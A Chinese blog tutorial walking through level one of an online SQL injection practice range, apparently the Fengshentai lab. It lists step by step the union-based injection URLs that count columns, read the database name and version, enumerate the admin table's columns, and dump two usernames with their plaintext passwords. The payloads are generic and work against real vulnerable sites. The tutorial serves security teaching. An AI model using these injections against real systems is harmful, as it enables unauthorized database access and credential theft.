书生这次准备了一份sql注入攻击的靶场演练教程

以封神台在线演练靶场为例(像游戏一样一关关过),就说第一章吧

题目如下:

要求是通过sql注入来获得管理员的密码

点击传送门,出现这样一个网页:

那么,第一步,确定目标,这里是:

http://rhiq8003.ia.aqlab.cn/

接下来第二步,来判断这里是否存在SQL注入的漏洞

开始操作:

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=1      //然后回车

看来,页面返回正常,接着下一个

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2   //回车(之后就不再写了,知道回车显示页面就行)

看,页面返回不正常了,所以我判断,这里可能会存在一个SQL注入漏洞

好,开始第三步,判断他有多少字段

一步步来,从1开始试探

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=1 order by 1

可以看到页面显示正常,接下来,测2

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=1 order by 2

页面返回正常,然后测3

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=1 order by 3

哦豁,页面返回多少有点不正常了,此时就可以判断出他的字段数为2

开始第四步,判断回显在哪里

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,2

这里显示为2,表明了我们想要的就在2这里显示

第五步,重要的来了,开始查询相关的我所需要的内容

先查数据库名称:

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,database()

出来了,maoshe

接着,我们来查看数据库的版本:

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,version()

版本5.5.53

接着再来查表名,就这样一步步的往下走

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()limit 0,1

出现了,admin表,一般管理员的账号密码都是存在于这个表里面

再接着,查字段名:

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1

出来了,第一个字段名id

再就查第二个:

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1

第二个字段名username

再查第三个:

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1

第三个字段名,password。至此数据库maoshe的admin表里的三个字段都出来了

分别为id,username,password

最后一步,查询username字段的内容,判断有几个用户:

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,username from admin limit 0,1

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,username from admin limit 1,1

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,username from admin limit 2,1

limit 2,1没有回显

至此,判断为有两个用户,分别为admin,ppt#*@#(这不兴写出来,自己点图片看)

然后,查询密码:

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,password from admin limit 0,1

这是用户admin的密码,为hellohack

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,password from admin limit 1,1

第二个用户ppt****密码为:zkaqbanban

Sql注入成功,成功得到管理员账号与密码

好了,文章到此结束。希望各位初学的看官多思考,掌握技巧。

声明:本文仅作学习使用,切勿做违法乱纪之事,如有相关情况,与本文作者无关。

浪客书生,以键证道...

SQL注入攻击(基础)相关推荐

  1. 基于pikachu漏洞平台的 --SQL注入攻击学习与总结

    SQL注入攻击 基础知识 常见注释符号 使用示例 pikachu 漏洞联系平台 -- SQL注入 SQL注入攻击流程 注入点类型 数字型注入(POST) 字符型注入(GET) 搜索型注入 XX型注入 ...

  2. mysql注入攻击实_三十三、MySQL基础系列笔记之MySQL安全问题与SQL注入攻击

    SQL注入攻击大多数与程序有关系,程序不严谨是导致SQL注入攻击成功的一个原因.安全问题不容忽视,平常的开发中应关注安全问题.下面简单记录PHP中的SQL攻击问题. 什么是SQL注入攻击 SQL注入( ...

  3. 从入门到入土:[SEED-Lab]-SQL注入攻击|SQL Injection Attack Lab|详细说明|实验步骤|实验截图

    此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出.欢迎各位前来交流.(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益.不合适引用,自当删除! 若 ...

  4. SQL注入攻击总结篇

    本文是关于SQL各种类型数据库的注入攻击自我复习总结,如果文中有不足的地方,麻烦大佬在评论中指出或者私聊我,谢谢- 本文讲述: SQL注入的原理 SQL注入的防御 SQL攻击的流程 其他数据库的注入方 ...

  5. sql注入漏洞,应屏蔽SQL注入攻击

    2019独角兽企业重金招聘Python工程师标准>>> 注:SQL注入好比是前端URL传参数请求时参数以SQL 做为参数传入,如 select 1  from dual where ...

  6. SQL注入攻击及防御 手动注入+sqlmap自动化注入实战(网络安全学习12)

    CONTENTS 1 项目实验环境 2 SQL注入概述 2.1 SQL注入简介 2.2 SQL注入的危害 3 SQL基础回顾 3.1 联合查询union 3.2 information_schema数 ...

  7. SQL注入攻击的原理、分类和防御方法

    一.SQL注入攻击原理 恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中,同时程序本身对用户输入内容过分信任而未对恶意用户插入的SQL语句进行过滤,导致SQL语句直接被服务端执行. 二.SQ ...

  8. 使用BurpSuite实验室练习SQL注入攻击

    因为之前对HTTP和Java都不熟悉,所以想要一开始就使用实验室师兄给的在线平台练习有点困难.好在我在一本参考书上看到推荐使用BurpSuite的在线实验室,又因为前段时间我恰好学习了Burp的网络扫 ...

  9. 什么是SQL注入攻击?SQL注入攻击原理是什么?

    SQL注入攻击是网络安全中非常常见的攻击方式之一,该攻击隐蔽性好.危害大.操作方便,也是各大企业及站长最容易遇到的攻击方式.那么SQL注入攻击原理是什么?如何防范?接下来跟着小编来看看吧. SQL注入 ...

最新文章

  1. 如何建立图像数据矩阵和图像显示灰度之间的关系!_放射技术考试第四章第一节 数字图像的特征...
  2. python使用matplotlib可视化、自定义移除Y轴指定轴刻度标签(removing specific axis ticks in matplotlib y axis)
  3. 使用Jodd简化邮件服务的开发
  4. 【面试题视频讲解】求一个数的所有质因子
  5. D - Delete Prime Gym - 102875D
  6. java 内部接口 内部类_Java的接口中中添加内部类,甚至实现外围接口的内部类,意义是什么?...
  7. inventor软件绘制百叶窗方法_三维工厂设计该使用什么软件?
  8. 通过自研数据库画像工具支持“去O”数据库评估
  9. Android 滑动冲突问题的简单解决思路
  10. Zebra 命令模式分析2
  11. 代码安全审计工具推荐
  12. git 无法上传vender目录(其中一个包被当成submodule)
  13. Qt5软键盘实现中文拼音输入法
  14. google 浏览器同步
  15. php实训参考文献,SPSS实训心得体会
  16. Java开发的基中之基
  17. 明翰英语教学系列之雅思阅读篇V0.9(持续更新)
  18. 微星系列原厂预装正版系统恢复镜像自带原机所有驱动
  19. QT5 ubuntu虚拟机下远程连接AGX或arm嵌入式开发板
  20. 最新CSGO国服能取回皮肤的国内开箱网站推荐大全

热门文章

  1. Redis 6.x 缓存穿透
  2. 今天字节的hr加我微信好友了
  3. hashlib 与 hmac 模块
  4. 2013年第二季度总结报告
  5. php手机端下载excel,PHPExcel:在客户端下载Excel文件
  6. 手把手教你直播平台怎么搭建
  7. 如何才能能够提升个人自信
  8. NVIDIA无法连接:NVIDIA-SMI has failed because it couldn‘t communicate with the NVIDIA driver
  9. 零基础使用Manim画傅里叶变换
  10. Python脚本 - 自动合成PPT长图